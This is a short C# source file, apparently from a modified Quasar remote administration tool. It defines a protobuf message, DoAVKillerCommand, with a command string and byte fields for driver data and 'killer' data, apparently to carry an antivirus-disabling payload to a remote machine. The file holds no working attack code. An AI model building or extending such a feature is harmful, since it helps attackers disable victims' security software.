using ProtoBuf;

namespace Quasar.Common.Messages
{
    [ProtoContract]
    public class DoAVKillerCommand : IMessage
    {
        [ProtoMember(1)]
        public string Command { get; set; }

        [ProtoMember(2)]
        public byte[] DriverData { get; set; }

        [ProtoMember(3)]
        public byte[] KillerData { get; set; }
    }
}
